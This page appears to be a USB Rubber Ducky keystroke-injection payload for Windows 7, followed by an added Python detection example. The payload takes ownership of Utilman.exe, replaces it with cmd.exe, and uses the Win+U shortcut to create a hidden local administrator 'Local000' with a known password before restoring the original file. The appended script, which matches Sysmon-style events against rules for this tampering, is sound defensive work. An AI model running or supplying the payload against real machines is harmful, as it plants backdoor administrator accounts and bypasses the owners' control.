95 lines
1.6 KiB
Plaintext
Author: Xcellerator (props to Jay Kruer's Fork Bomb script for the UAC bypass technique!)
Duckencoder: 1.0
Target: Windows 7
Description: Uses the Utilman.exe Exploit to create a new local administrator account “Local000” with the password “hak5”.

REM Author: Xcellerator
REM Description: Utilman Exploiter to create a new Admin Account
REM The new account will be called "Local000".
REM Step 1: open an elevated command prompt (Start menu search, context menu "Run as administrator", accept the UAC prompt).
GUI
DELAY 50
STRING cmd
MENU
STRING a
ENTER
LEFT
ENTER
DELAY 200
REM Step 2: take ownership of Utilman.exe and swap it for a renamed copy of cmd.exe (the original is kept as Utilman.exe.bak).
STRING takeown /f "%systemroot%\System32\Utilman.exe"
ENTER
DELAY 50
STRING icacls "%systemroot%\System32\Utilman.exe" /grant administrators:F /T
ENTER
DELAY 50
STRING cd %systemroot%\System32
ENTER
DELAY 50
STRING mkdir util
ENTER
STRING xcopy cmd.exe util\
ENTER
DELAY 50
STRING ren Utilman.exe Utilman.exe.bak
ENTER
STRING cd util
ENTER
DELAY 50
STRING ren cmd.exe Utilman.exe
ENTER
DELAY 50
STRING cd ..
ENTER
DELAY 50
STRING xcopy util/Utilman.exe \
ENTER
DELAY 50
STRING rmdir /s /q util
ENTER
DELAY 50
STRING exit
ENTER
DELAY 50
REM Step 3: Win+U now launches the swapped binary; create the account and add it to the Administrators group.
GUI u
STRING net user Local000 /add
ENTER
DELAY 50
STRING net localgroup administrators Local000 /add
ENTER
DELAY 50
STRING exit
ENTER
DELAY 50
REM Step 4: delete the swapped binary and restore the original Utilman.exe from the backup.
GUI r
STRING cmd
ENTER
DELAY 50
STRING cd "%systemroot%\System32"
ENTER
DELAY 50
STRING del Utilman.exe
ENTER
DELAY 50
STRING y
ENTER
DELAY 50
STRING ren Utilman.exe.bak Utilman.exe
ENTER
DELAY 50
STRING exit
ENTER
REM Step 5: from a second elevated prompt, set the new account's password.
GUI
STRING cmd
MENU
STRING a
ENTER
DELAY 50
LEFT
ENTER
DELAY 200
STRING net user Local000 *
ENTER
STRING hak5
ENTER
STRING hak5
ENTER
STRING exit
ENTER
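For defenders, the payload above leaves a recognisable trail: ownership and ACL changes on Utilman.exe, rename and delete operations on it, a process named Utilman.exe whose PE version resource says it is cmd.exe, and a new local account that is immediately added to Administrators. The following Python is an added detection example, not part of the payload or of Xcellerator's work. It runs those rules over constructed, simplified process-creation events with Sysmon Event ID 1 style fields (UtcTime, User, Image, OriginalFileName, CommandLine, separated by " | "); the log format, the sample events and the rule names are assumptions made for this example. It also generalises from Utilman.exe to the other logon-screen accessibility helpers (sethc.exe, osk.exe, narrator.exe, magnify.exe, displayswitch.exe), which the page itself does not mention.

```python
"""Added detection example (not part of the payload above).

Runs three rules over constructed, simplified process-creation events with
Sysmon Event ID 1 style fields: UtcTime | User | Image | OriginalFileName | CommandLine.
"""
import re
from dataclasses import dataclass

# Accessibility helpers that winlogon can launch from the logon screen. The payload
# above swaps Utilman.exe; the other names are the same class of binary and are an
# added generalisation, not taken from the page.
ACCESSIBILITY_BINARIES = {
    "utilman.exe", "sethc.exe", "osk.exe", "narrator.exe", "magnify.exe", "displayswitch.exe",
}

# Command lines that change ownership/ACLs or rename, copy, move or delete files,
# optionally wrapped in "cmd /c".
FILE_VERB_RE = re.compile(
    r"^\s*(?:cmd(?:\.exe)?\s+/c\s+)?(?:takeown|icacls|ren|rename|copy|xcopy|move|del|erase)\b",
    re.IGNORECASE)
EXE_TOKEN_RE = re.compile(r"\w+\.exe", re.IGNORECASE)
NET_USER_ADD_RE = re.compile(r"\bnet1?\s+user\s+(?P<acct>\S+)\b.*?/add\b", re.IGNORECASE)
NET_ADMIN_ADD_RE = re.compile(
    r"\bnet1?\s+localgroup\s+administrators\s+(?P<acct>\S+)\s+/add\b", re.IGNORECASE)


@dataclass(frozen=True)
class Finding:
    line_no: int
    rule: str
    detail: str


def parse_event(line: str) -> dict:
    """Split one constructed log line into its five ' | '-separated fields."""
    parts = [p.strip() for p in line.split(" | ", 4)]
    if len(parts) != 5:
        raise ValueError(f"expected 5 fields, got {len(parts)}: {line!r}")
    ts, user, image, original_name, cmdline = parts
    return {"ts": ts, "user": user, "image": image,
            "original_name": original_name, "cmdline": cmdline}


def scan(lines):
    """Return a Finding for every event that matches one of the three rules."""
    findings = []
    created = {}  # lower-cased account name -> line where "net user X /add" was seen
    for n, raw in enumerate(lines, start=1):
        if not raw.strip():
            continue
        ev = parse_event(raw)
        image = ev["image"].rsplit("\\", 1)[-1].lower()
        original = ev["original_name"].lower()
        cmd = ev["cmdline"]

        # Rule 1: a process whose on-disk name is an accessibility helper but whose
        # PE version resource says it is another program (e.g. Utilman.exe -> Cmd.Exe).
        if image in ACCESSIBILITY_BINARIES and original not in ("", "-", image):
            findings.append(Finding(n, "accessibility-binary-replaced",
                                    f"{image} reports OriginalFileName {ev['original_name']}"))

        # Rule 2: takeown/icacls/ren/del/... naming an accessibility helper.
        if FILE_VERB_RE.match(cmd):
            touched = {t.lower() for t in EXE_TOKEN_RE.findall(cmd)} & ACCESSIBILITY_BINARIES
            if touched:
                findings.append(Finding(n, "accessibility-binary-tamper", ", ".join(sorted(touched))))

        # Rule 3: local account creation followed by promotion to Administrators,
        # correlated on the account name across the whole log.
        m = NET_USER_ADD_RE.search(cmd)
        if m:
            created[m.group("acct").lower()] = n
        m = NET_ADMIN_ADD_RE.search(cmd)
        if m:
            acct = m.group("acct").lower()
            rule = "new-local-admin" if acct in created else "admin-group-add"
            findings.append(Finding(n, rule, acct))
    return findings


# Constructed sample events: the first seven mirror the payload above, the last two are benign.
SAMPLE_LOG = """\
2024-05-01T08:00:01Z | CORP\\jdoe | C:\\Windows\\System32\\cmd.exe | Cmd.Exe | cmd
2024-05-01T08:00:03Z | CORP\\jdoe | C:\\Windows\\System32\\takeown.exe | takeown.exe | takeown /f "%systemroot%\\System32\\Utilman.exe"
2024-05-01T08:00:04Z | CORP\\jdoe | C:\\Windows\\System32\\icacls.exe | iCACLS.EXE | icacls "%systemroot%\\System32\\Utilman.exe" /grant administrators:F /T
2024-05-01T08:00:05Z | CORP\\jdoe | C:\\Windows\\System32\\cmd.exe | Cmd.Exe | cmd /c ren Utilman.exe Utilman.exe.bak
2024-05-01T08:00:09Z | NT AUTHORITY\\SYSTEM | C:\\Windows\\System32\\Utilman.exe | Cmd.Exe | Utilman.exe
2024-05-01T08:00:12Z | CORP\\jdoe | C:\\Windows\\System32\\net.exe | net.exe | net user Local000 /add
2024-05-01T08:00:13Z | CORP\\jdoe | C:\\Windows\\System32\\net.exe | net.exe | net localgroup administrators Local000 /add
2024-05-01T09:15:00Z | CORP\\asmith | C:\\Windows\\System32\\Utilman.exe | utilman.exe | Utilman.exe
2024-05-01T09:16:00Z | CORP\\asmith | C:\\Windows\\System32\\cmd.exe | Cmd.Exe | cmd /c ren report.exe report_old.exe
"""


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG.splitlines()):
        print(f"line {f.line_no}: {f.rule} ({f.detail})")
```

Rule 1 is the one that survives even if the attacker's command lines are never logged, because it keys on the mismatch between the on-disk name and the OriginalFileName that Sysmon reads from the PE version resource; a genuine Utilman.exe (the eighth sample line) produces no finding. Rule 3 deliberately distinguishes a plain Administrators group change from one that follows a fresh account creation, since the latter pair is the end state this payload is built to reach.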